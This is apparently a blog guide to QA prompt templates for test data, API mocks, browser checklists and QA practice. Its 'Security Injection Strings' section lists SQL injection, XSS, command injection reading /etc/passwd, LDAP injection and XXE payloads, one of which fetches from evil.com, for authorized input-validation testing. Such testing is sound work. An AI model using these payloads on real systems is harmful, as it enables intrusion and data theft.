Column | Type | Constraint | Sample Value
| | |
| | |

INSERT Statements Template
CODE:
INSERT INTO [TABLE_NAME] ([COLUMNS])
VALUES
-- Row 1
([VALUES]),
-- Row 2
([VALUES]),
-- Row 3
([VALUES]);
END CODE

Generated Data Rows
Row # | Column Values
1 | |
2 | |
3 | |

Sample Output (PostgreSQL)
CODE:
INSERT INTO users (id, name, email, created_at, status)
VALUES
(1, 'John Smith', 'john.smith@test.com', '2024-01-01 00:00:00', 'active'),
(2, 'Jane Doe', 'jane.doe@test.com', '2024-01-02 00:00:00', 'active'),
(3, 'Bob Wilson', 'bob@test.com', '2024-01-03 00:00:00', 'inactive');
END CODE

Data Variation Guidelines
Type | Strategy
IDs | Sequential or UUID
Names | Varied, realistic
Emails | Based on name
Dates | Spread over range
Status | Realistic distribution
FKs | Reference valid IDs

Special Data Cases
Case | Approach
NULL values | Random distribution
Foreign keys | Reference valid IDs
Unique constraints | Ensure uniqueness
Default values | Use when appropriate
Timestamps | Use NOW() or specific dates

BEST PRACTICES
- Match database syntax exactly
- Ensure foreign key validity
- Handle NULLs appropriately
- Maintain data consistency
- Include realistic value distributions
- Consider performance for large datasets

Customize it: Provide your table schema so the INSERT statements match your actual database.

13. JSON Response Mocker

API testing requires API responses. This prompt generates realistic mock responses based on your API schemas, including error scenarios.

Purpose: Create realistic mock API responses based on schemas Use case: Mocking APIs for frontend and integration testing


Prompt:

You are an API Mocking Specialist. Your task is to create realistic mock API responses based on schemas.

CONTEXT
- API Endpoint: {ENDPOINT PATH}
- HTTP Method: {GET/POST/PUT/DELETE}
- Response Schema: {DESCRIBE THE SCHEMA}
- Status Codes: {WHAT CODES CAN IT RETURN?}
- Response Type: {SUCCESS/ERROR/BOTH}
- Pagination: {OFFSET/CURSOR/NONE}

API RESPONSE FRAMEWORK
Standard Response Structure
CODE:
{
  "data": {},
  "meta": {
    "message": "",
    "status": 200,
    "timestamp": ""
  }
}
END CODE

Error Response Structure
CODE:
{
  "error": {
    "code": "",
    "message": "",
    "details": []
  },
  "meta": {
    "status": 400,
    "timestamp": ""
  }
}
END CODE

OUTPUT FORMAT - SUCCESS RESPONSE
CODE:
{
  "data": {
    "id": "",
    "type": "",
    "attributes": {
      // Fields here
    },
    "relationships": {
      // Related resources
    }
  },
  "included": [],
  "links": {
    "self": "",
    "next": "",
    "last": ""
  }
}
END CODE

Response Examples
Single Resource
Field | Type | Description | Example
id | string | Unique identifier | "usr_123"
name | string | Resource name | "Sample"
createdAt | string | ISO timestamp | "2024-01-01T00:00:00Z"

List Response
Field | Type | Description
data | array | List of resources
meta | object | Pagination info
links | object | Navigation links

Error Response
Field | Type | Description
error.code | string | Error code
error.message | string | Human-readable message
error.details | array | Additional details

Pagination Variants
Type | Response Parameters
Offset | page=1, limit=20
Cursor | cursor=abc123
None | All results returned

Mock Scenarios
Scenario 1: Standard Success
CODE:
{
  "data": {},
  "meta": {
    "status": 200,
    "message": "Success"
  }
}
END CODE

Scenario 2: Empty Result
CODE:
{
  "data": [],
  "meta": {
    "status": 200,
    "message": "No data found"
  }
}
END CODE

Scenario 3: Validation Error
CODE:
{
  "error": {
    "code": "VALIDATION_ERROR",
    "message": "Invalid input",
    "details": [
      {
        "field": "email",
        "message": "Invalid format"
      }
    ]
  }
}
END CODE

Scenario 4: Server Error
CODE:
{
  "error": {
    "code": "INTERNAL_ERROR",
    "message": "An error occurred"
  }
}
END CODE

BEST PRACTICES
- Match real API structure exactly
- Include all possible fields
- Use realistic data values
- Handle all error scenarios
- Consider edge cases
- Include pagination metadata

Customize it: Describe your actual API schema for accurate mocking.

Cross-Platform and Security Prompts

14. Cross-Browser Testing Checklist

Browsers render differently. Safari doesn’t always behave like Chrome. Firefox has its quirks. Edge is its own thing. This prompt creates a checklist to verify your app works across browsers and devices.

Purpose: Create a comprehensive checklist for verifying UI consistency across devices and browsers Use case: Cross-browser and cross-device testing


Prompt:

You are a Cross-Browser Testing Specialist. Your task is to create a comprehensive checklist for verifying UI consistency across devices and browsers.

CONTEXT
- Application Type: {WEB/MOBILE-WEB/RESPONSIVE}
- Target Browsers: {CHROME/FIREFOX/SAFARI/EDGE}
- Target Devices: {DESKTOP/TABLET/MOBILE}
- Screen Sizes: {WHAT SIZES TO TEST?}
- Key Features: {CRITICAL FEATURES TO VERIFY}

BROWSER TESTING MATRIX
Browser | Version | Priority | Critical Checks
Chrome | Latest | High | Core functionality
Firefox | Latest | High | CSS/JS compatibility
Safari | Latest | High | WebKit differences
Edge | Latest | Medium | Chromium compatibility

OUTPUT FORMAT - DESKTOP CHECKLIST (1366px+)
Category | Check Item | Chrome | Firefox | Safari | Edge
Layout | Grid alignment | ☐ | ☐ | ☐ | ☐
Layout | Flexbox behavior | ☐ | ☐ | ☐ | ☐
Layout | Typography | ☐ | ☐ | ☐ | ☐
Forms | Input focus states | ☐ | ☐ | ☐ | ☐
Forms | Validation messages | ☐ | ☐ | ☐ | ☐
Forms | Button hover | ☐ | ☐ | ☐ | ☐
Media | Image rendering | ☐ | ☐ | ☐ | ☐
Media | Video playback | ☐ | ☐ | ☐ | ☐
Media | Font loading | ☐ | ☐ | ☐ | ☐

TABLET CHECKLIST (768px - 1024px)
Category | Check Item | iPad | Android Tablet
Layout | Responsive breakpoints | ☐ | ☐
Layout | Touch targets (44px+) | ☐ | ☐
Layout | Scroll behavior | ☐ | ☐
Navigation | Hamburger menu | ☐ | ☐
Navigation | Swipe gestures | ☐ | ☐

MOBILE CHECKLIST (< 768px)
Category | Check Item | iOS | Android
Viewport | Meta viewport set | ☐ | ☐
Viewport | No horizontal scroll | ☐ | ☐
Touch | Tap targets | ☐ | ☐
Touch | Gesture support | ☐ | ☐
OS Features | Pull-to-refresh | ☐ | ☐
OS Features | Safe area insets | ☐ | ☐

CRITICAL FUNCTIONALITY TESTS
Feature | Browser | Test | Expected | Result
Login | Chrome | Standard login | Success |
Forms | Firefox | Submit with validation | Shows errors |
API | Safari | AJAX calls | Works |

VISUAL REGRESSION POINTS
Component | Desktop | Tablet | Mobile
Header | ☐ | ☐ | ☐
Hero section | ☐ | ☐ | ☐
Cards | ☐ | ☐ | ☐
Footer | ☐ | ☐ | ☐

BEST PRACTICES
- Test in real devices when possible
- Focus on highest-market-share browsers first
- Document known browser quirks
- Use responsive design breakpoints
- Test with actual user agent strings
- Consider browser-specific CSS prefixes

Customize it: Customize the checklist based on your application’s specific features and requirements.

15. Security Injection Strings

Security testing is everyone’s responsibility, not just the security team’s. This prompt generates common injection payloads for testing input validation. Use only in test environments with authorization. The OWASP Foundation provides comprehensive security testing guidelines and the Input Validation Cheat Sheet covers best practices for preventing injection vulnerabilities.

Purpose: Generate common injection payloads for security testing Use case: Testing input validation and sanitization


Prompt:

You are a Security Testing Specialist. Your task is to generate common injection payloads for security testing.

CONTEXT
- Target: {FORM/API/INPUT/URL PARAMETER}
- Input Type: {TEXT/NUMBER/QUERY/PARAM}
- Injection Type: {SQLI/XSS/CSI/LDAP}
- Encoding: {URL/BASE64/HEX}
- Test Type: {AUTOMATED/MANUAL}

INJECTION TYPES FRAMEWORK
Type | Purpose | Risk Level
SQL Injection | Database compromise | Critical
XSS | Script injection | High
Command Injection | OS command execution | Critical
LDAP Injection | Directory traversal | High
XXE | XML entity injection | Critical

OUTPUT FORMAT - SQL INJECTION PAYLOADS
Payload | Type | Purpose
' OR '1'='1 | Union-based | Extract data
' UNION SELECT | Union-based | Blind extraction
' WAITFOR DELAY | Time-based | Blind SQLi
'; DROP TABLE | Destructive | Delete data
admin'-- | Authentication | Bypass login

SQLi - Authentication Bypass
CODE:
admin'--
admin' OR '1'='1
' OR 1=1--
' OR 'x'='x
END CODE

SQLi - Union Based
CODE:
' UNION SELECT 1,2,3--
' UNION SELECT user,password FROM users--
' UNION SELECT null,@@version--
END CODE

SQLi - Time Based
CODE:
'; WAITFOR DELAY '0:0:5'--
' OR SLEEP(5)--
'; IF(1=1) WAITFOR DELAY '0:0:5'--
END CODE

SQLi - Error Based
CODE:
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
END CODE

XSS PAYLOADS
Payload | Type | Description
<script>alert(1)</script> | Stored | Persistent XSS
javascript:alert(1) | DOM | URL-based
<img src=x onerror=alert(1)> | Reflected | Image error handler
"><script>alert(1)</script> | Stored | Attribute breakout

XSS - Basic
CODE:
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
END CODE

XSS - Event Handlers
CODE:
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<object data="javascript:alert(1)">
END CODE

XSS - Polyglots
CODE:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=
END CODE

Command Injection Payloads
CODE:
; cat /etc/passwd
| whoami
$(whoami)
`id`
&& dir
|| ls
END CODE

LDAP Injection Payloads
CODE:
*)(uid=*))(| (uid=*
*)(objectClass=*)
*)(userPassword=*)
END CODE

XXE Payloads
CODE:
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "http://evil.com/evil.dtd">
END CODE

Encoding Variants
Original | URL Encoded | Base64
' OR '1'='1 | %27%20OR%20... | JyBPUiAnMSc9Jw==
<script> | %3Cscript%3E | PHNjcmlwdD4=

BEST PRACTICES
- Get written authorization FIRST
- Test in non-production environments
- Document all findings
- Use low-volume payloads initially
- Don't cause denial of service
- Report responsibly to security team
- Use these only for defensive testing

Customize it: Use only in authorized testing environments. Never use these payloads on production systems without explicit authorization.

Building a Sustainable QA Practice

After years of doing QA work and helping teams improve their testing practices, I’ve learned that the prompts are just one piece of a larger puzzle. The real challenge isn’t writing individual test cases—it’s building a QA culture where quality is everyone’s responsibility.

The Evolution of a QA Engineer

When I started in QA, I thought my job was to find bugs. I’d spend hours manually testing features, documenting every discrepancy I found, and feeling satisfied when developers fixed my findings. This approach works for small projects, but it doesn’t scale—and it creates an adversarial relationship between QA and development.

Over time, my role shifted. Instead of finding bugs after they were written, I started getting involved earlier. I’d review requirements before development began, asking questions like “how will we test this?” and “what are the edge cases?” This shifted my job from detection to prevention. The bugs I caught in review were cheaper to fix than the bugs I found in testing.

Then I moved further left. I started participating in design discussions, helping engineers think about testability before they wrote code. I advocated for logging and observability that would make debugging easier. I built automation that caught regressions before they reached QA. My title didn’t change much, but my impact grew exponentially.

The prompts in this guide support all these phases of QA evolution. Early-phase prompts like Acceptance Criteria to Test Cases help you think systematically about requirements. Testing-phase prompts like Edge Case Brainstormer and Manual Test Case Generator help you verify functionality. Automation prompts help you catch regressions continuously. And if you’re building AI-powered systems yourself, you’ll want to learn how to build a RAG chatbot with proper testing built in from day one.

Managing Test Debt

Just like code debt, test debt accumulates when you take shortcuts. You skip writing a test because “it’s a simple change.” You don’t update a test when requirements shift. You build automation that passes but doesn’t actually verify meaningful behavior. Over time, these shortcuts accumulate until your test suite becomes unreliable, unmaintainable, and untrustworthy.

Managing test debt requires regular attention. I recommend scheduling time specifically for test debt reduction—perhaps one day per sprint where you don’t work on new tests but instead improve existing ones. During this time, look for tests that frequently produce false positives and fix or remove them. Find tests that are slow and optimize them. Update tests that haven’t been touched in months to ensure they’re still relevant.

Metrics That Actually Matter

QA teams often track metrics that feel important but don’t actually predict quality. Test coverage percentages that say nothing about whether the right things are tested. Number of bugs found that says nothing about whether those bugs should have been caught earlier. Pass rates that don’t distinguish between meaningful verification and checkbox-filling.

The metrics I’ve found more useful focus on outcomes rather than activities. Mean time to detect—how long do bugs exist before we find them? Mean time to repair—how long does it take to fix bugs once found? Escaped defects—how many bugs make it to production? These metrics tell you whether your QA process is actually improving quality.


Quick Reference: All QA Prompts

#PromptPurposeBest For
1Acceptance Criteria to Test CasesAC → test checklistRequirement testing
2Manual Test Case GeneratorStep-by-step testsTest documentation
3Severity/Priority ClassifierBug classificationBug triage
4Regression Test Suite SelectorSelect regression testsChange impact analysis
5Edge Case BrainstormerIdentify edge casesTest planning
6Performance Scenario GeneratorLoad testing plansPerformance testing
7Unit Test WriterGenerate unit testsCode testing
8Cypress/Playwright Script WriterE2E automationUser journey testing
9CSS Selector FinderFind stable selectorsTest automation
10Bug Report GeneratorCreate bug reportsIssue documentation
11Synthetic User GeneratorGenerate test usersData creation
12SQL Insert Statement GeneratorCreate test dataDatabase testing
13JSON Response MockerMock API responsesAPI testing
14Cross-Browser Testing ChecklistBrowser/device testingUI compatibility
15Security Injection StringsSecurity payloadsSecurity testing

Best Practices for QA Prompts

After years of using these prompts, here’s what I’ve learned:

Use prompts for the tedious work, not the thinking. The prompt generates a test case framework—you still need to verify it makes sense. The prompt generates bug report templates—you still need to fill in accurate details.

Iterate on inputs. Your first prompt output might not be perfect. Add more context, clarify constraints, and run the prompt again. The quality of output directly correlates with quality of input.

Combine prompts strategically. Start with Edge Case Brainstormer to identify what to test, then use Manual Test Case Generator to write the tests, then use Bug Report Generator if issues are found.


Frequently Asked Questions

Do I need to use all 15 prompts?

No. Start with the ones that address your immediate needs. If you’re writing a new feature, start with Acceptance Criteria to Test Cases. If you’re planning a release, start with Regression Test Suite Selector.

Can I use these prompts with any AI?

Yes. These prompts work with ChatGPT, Claude, Gemini, or any other conversational AI. Just paste the prompt and fill in your details.

Are these prompts suitable for regulated industries?

Most are, but use judgment. The Security Injection Strings prompt, for example, should only be used with proper authorization and in appropriate environments.

How do I adapt prompts for my specific codebase?

Add context. Replace the bracketed placeholders with your actual code, schemas, and requirements. The prompts are templates—your inputs make them specific.


Ship with Confidence

QA isn’t about being the person who says “no.” It’s about being the person who enables the team to ship faster because they’re confident the release is solid. These 15 prompts will help you work more efficiently, think more systematically, and catch more bugs before they reach production. For more advanced prompting techniques, explore our guide on chain of thought prompting to take your AI-assisted testing to the next level.

Pick one prompt that addresses your current challenge. Try it. Refine it. Add another.

The best releases are the ones where nothing breaks in production. Let’s make those happen more often.


Last Updated: 2026-01-28

Found this helpful? Share it with others.

Vibe Coder avatar

Vibe Coder

AI Engineer & Technical Writer
5+ years experience

AI Engineer with 5+ years of experience building production AI systems. Specialized in AI agents, LLMs, and developer tools. Previously built AI solutions processing millions of requests daily. Passionate about making AI accessible to every developer.

AI Agents LLMs Prompt Engineering Python TypeScript